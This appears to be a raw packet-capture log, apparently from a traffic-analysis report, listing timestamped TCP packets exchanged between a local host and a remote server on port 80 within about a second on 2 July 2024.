                                            Jul 2, 2024 08:26:34.913666010 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913666964 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913678885 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913702965 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913717031 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913816929 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913829088 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913841009 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913852930 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.913856983 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913870096 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.913896084 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.914000988 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.914012909 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.914041996 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.914064884 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.914114952 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.914127111 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.914163113 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948574066 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948617935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948630095 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948641062 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948652983 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948663950 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948676109 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948685884 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948692083 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948703051 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948714972 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948719978 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948726892 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948740005 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948753119 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948765039 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948776960 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948784113 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948788881 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948801041 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948810101 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948812962 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948824883 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948829889 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948839903 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948848963 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948851109 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948863983 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948865891 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948874950 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948887110 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948889971 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948899031 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948911905 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948923111 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948924065 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948934078 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948945045 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948946953 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948957920 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948961973 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.948971033 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948983908 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948995113 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.948996067 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949008942 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949022055 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949027061 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949033976 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949047089 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949050903 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949064970 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949076891 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949080944 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949089050 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949100971 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949107885 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949112892 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949125051 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949131012 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949136972 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949147940 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949160099 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949163914 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949172974 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949186087 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949187994 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949203014 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949212074 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949215889 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949224949 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949230909 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949242115 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949253082 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949265003 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949270010 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949278116 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.949295998 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949306011 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.949340105 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.954925060 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.954947948 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.954958916 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955008984 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955024004 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955044031 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955059052 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955070972 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955086946 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955115080 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955280066 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955291986 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955305099 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955315113 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955319881 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955328941 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955341101 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955348969 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955353022 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955364943 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955383062 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955396891 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955482960 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955497980 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955522060 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955538988 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955562115 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955564976 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955583096 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955599070 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955657005 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955668926 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955682039 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955697060 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955718040 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955797911 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955810070 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955830097 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955838919 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955849886 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955863953 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955873966 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955877066 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955889940 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.955904961 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955918074 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.955944061 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.956156969 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956197977 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956204891 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.956209898 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956233025 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.956244946 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.956322908 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956335068 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956346989 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956358910 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956360102 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.956374884 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.956399918 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.956454992 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956491947 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:34.956520081 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:34.956561089 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008373976 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008428097 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008446932 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008579969 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008580923 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008580923 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008594036 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008610010 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008621931 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008630991 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008640051 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008687973 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008790016 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008801937 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008812904 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008824110 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008831024 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008836031 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008847952 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008851051 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008860111 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008871078 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008877993 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008882999 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.008898020 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008907080 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.008939981 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.009102106 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.009143114 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.009175062 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.009213924 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.009227991 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.009241104 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.009272099 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.039855957 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.039885044 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.039896011 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.039987087 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.039988995 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.039999962 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040013075 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040014029 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040051937 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040079117 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040116072 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040127993 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040138006 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040165901 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040179968 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040251017 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040262938 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040272951 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040297985 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040334940 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040374994 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040391922 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040402889 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040421009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040441036 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040524960 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040538073 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040572882 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040604115 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040621042 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040646076 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040672064 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040819883 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040832043 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040842056 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040857077 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040868044 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040898085 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.040958881 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040970087 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040981054 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.040992022 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041006088 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041021109 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041089058 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041131020 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041167974 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041179895 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041192055 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041208029 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041218042 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041244984 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041328907 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041369915 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041435957 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041445017 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041450977 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041459084 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041464090 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041469097 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041486979 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041522980 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041706085 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041723967 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041740894 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041757107 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041763067 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041764021 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041784048 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041811943 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.041954994 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.041997910 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042010069 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042021036 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042063951 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042125940 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042138100 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042150021 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042160034 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042171955 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042185068 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042216063 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042423010 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042433977 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042443991 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042457104 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042468071 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042475939 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042481899 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042496920 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042509079 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042521954 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042551041 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042660952 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042711973 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042738914 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042751074 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042788982 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042880058 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042891979 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042902946 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042913914 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.042927980 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.042944908 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043169022 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043180943 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043190956 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043204069 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043215036 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043229103 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043230057 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043243885 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043252945 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043255091 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043267965 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043276072 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043291092 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043323040 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043533087 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043572903 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043576002 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043632030 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043665886 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043678045 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043689013 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043713093 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043740034 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043886900 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043904066 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043915033 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043930054 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043941021 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043942928 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043953896 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043967009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.043967009 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.043993950 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.044006109 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.044231892 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.044244051 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.044279099 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.070008993 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.070046902 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.070056915 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.070118904 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.070154905 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.070274115 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.070286036 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.070297003 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.070332050 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.070346117 CEST6388180192.168.2.477.91.77.81
